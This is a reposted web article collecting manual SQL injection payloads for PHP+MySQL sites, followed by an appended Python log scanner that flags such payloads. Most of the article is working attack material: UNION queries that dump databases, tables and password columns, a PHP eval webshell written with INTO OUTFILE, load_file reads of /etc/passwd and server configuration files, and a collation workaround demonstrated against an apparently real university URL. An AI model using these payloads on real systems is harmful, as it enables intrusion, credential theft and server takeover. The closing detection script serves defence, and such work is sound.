PHP+MySQL manual injection statement collection (recommended)
- 2020-03-31 16:46:14
- OfStack
Find the number of fields
order by num /*
Match the fields
and 1=1 union select 1,2,3,4,5......N /*
Find the displayed field positions
and 1=2 union select 1,2,3,4,5......N /*
Dump database information with built-in functions
version() database() user()
Dump database information without guessing the displayed field (does not work on some sites):
and 1=2 union all select version() /*
and 1=2 union all select database() /*
and 1=2 union all select user() /*
Operating system information:
and 1=2 union all select @@global.version_compile_os from mysql.user /*
Database privileges:
and ord(mid(user(),1,1))=114 /*   (114 is 'r': tests whether user() begins with root)
Dump databases (MySQL > 5.0)
MySQL 5+ has a built-in database, information_schema, that stores the structure information of all databases and tables.
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.schemata limit 0,1
Dump tables
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.tables where TABLE_SCHEMA=database name (in hex) limit 0,1 (shows 1 record) --
Dump columns
and 1=2 union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.columns where TABLE_NAME=table name (in hex) limit 0,1
Dump passwords
and 1=2 union select 1,2,3,username column,5,6,7,password column,8,9 from table name limit 0,1
Advanced usage (one displayed field shows two values):
union select 1,2,3,concat(username column,0x3c,password column),5,6,7,8,9 from table name limit 0,1
Write a webshell directly (root)
Conditions: 1. the physical path of the site is known
2. sufficient privileges (test with select ... from mysql.user)
3. magic_quotes_gpc = OFF
select '<?php eval($_POST[cmd])?>' into outfile 'physical path'
and 1=2 union all select HEX into outfile 'path'   (HEX = hex-encoded file content)
load_file() common paths:
1. replace(load_file(0x2f6574632f706173737764),0x3c,0x20)
2. replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
The two statements above display the full source of a PHP file. Without replacing characters such as "<" with a space, the browser renders the result as a web page and the code cannot be viewed.
3. load_file(char(47)) lists the root directory on FreeBSD and SunOS systems
4. /etc/httpd/conf/httpd.conf or /usr/local/apache/conf/httpd.conf: Linux Apache virtual host configuration
5. c:\Program Files\Apache Group\Apache\conf\httpd.conf or c:\Apache\conf\httpd.conf: Windows Apache configuration
6. c:/Resin-3.0.14/conf/resin.conf: Resin configuration of a JSP site
7. c:/Resin/conf/resin.conf, /usr/local/resin/conf/resin.conf: JSP virtual host configuration on Linux
8. d:\APACHE\Apache2\conf\httpd.conf
9. C:\Program Files\mysql\my.ini
10. ../themes/darkblue_orange/layout.inc.php: discloses the phpMyAdmin path
11. c:\Windows\system32\inetsrv\metabase.xml: IIS virtual host configuration
12. /usr/local/resin-3.0.22/conf/resin.conf: Resin 3.0.22 configuration
13. /usr/local/resin-pro-3.0.22/conf/resin.conf: same as above
14. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf: Apache virtual host configuration
15. /etc/sysconfig/iptables
16. /usr/local/app/php5/lib/php.ini: PHP settings
17. /etc/my.cnf: MySQL configuration
18. /etc/redhat-release: Red Hat system version
19. C:\mysql\data\mysql\user.MYD: MySQL system user passwords
20. /etc/sysconfig/network-scripts/ifcfg-eth0: IP address
21. /usr/local/app/php5/lib/php.ini // PHP
22. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf // virtual site settings
23. C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
24. c:\Windows\my.ini
25. c:\boot.ini
config.inc.php, config.php: replace(load_file(HEX),char(60),char(32))
Note:
char(60) is <
char(32) is a space
Problems with manual injection:
After injection, the page displays:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
For example: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=20 and 1=2 union select 1,load_file(0x433a5c626f6f742e696e69),3,4,user()
This is caused by inconsistent character encodings: the two sides of the UNION use different collations.
Solution: wrap the parameter in unhex(hex(...)). The URL above becomes:
http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=20 and 1=2 union select 1,unhex(hex(load_file(0x433a5c626f6f742e696e69))),3,4,unhex(hex(user()))
and the injection can continue...
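As an added example (not part of the original article), the following Python scans web server access-log lines for the statement patterns collected above (union select, order by probes, information_schema, load_file, into outfile, and the unhex(hex()) collation workaround) and decodes the 0x and char() literals so an analyst can see which file a payload referenced. The log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not from the article), Apache combined-log style.
# Lines 2 and 4 carry payloads of the kind the cheat sheet lists.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Mar/2020:16:46:14 +0000] "GET /instrument.php?ID=20 HTTP/1.1" 200 5120
10.0.0.9 - - [31/Mar/2020:16:46:20 +0000] "GET /instrument.php?ID=20%20and%201=2%20union%20select%201,load_file(0x2f6574632f706173737764),3,4,user()%20 HTTP/1.1" 200 812
10.0.0.5 - - [31/Mar/2020:16:46:25 +0000] "GET /news.php?id=7&page=2 HTTP/1.1" 200 4096
10.0.0.9 - - [31/Mar/2020:16:46:31 +0000] "GET /instrument.php?ID=20%20and%201=2%20union%20select%201,unhex(hex(load_file(char(47,101,116,99,47,112,97,115,115,119,100)))),3,4,5 HTTP/1.1" 200 770
"""

# Signatures derived from the statements in the cheat sheet above.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "into_outfile": re.compile(r"\binto\s+outfile\b", re.I),
    "unhex_hex_wrap": re.compile(r"\bunhex\s*\(\s*hex\s*\(", re.I),
}
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2})+)", re.I)   # even-length hex only
CHAR_LITERAL = re.compile(r"\bchar\s*\(([\d\s,]+)\)", re.I)
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)')

def decode_literals(query):
    """Render 0x... and char(...) literals of a decoded query as text for triage."""
    out = [bytes.fromhex(m.group(1)).decode("latin-1") for m in HEX_LITERAL.finditer(query)]
    for m in CHAR_LITERAL.finditer(query):
        out.append("".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()))
    return out

def scan_log(text):
    """Return (client_ip, signatures hit, decoded literals) per matching request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        query = unquote_plus(m.group(1))   # payloads arrive URL-encoded
        hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(query))
        if hits:
            findings.append((line.split()[0], hits, decode_literals(query)))
    return findings

if __name__ == "__main__":
    for ip, hits, literals in scan_log(SAMPLE_LOG):
        print(ip, hits, literals)
```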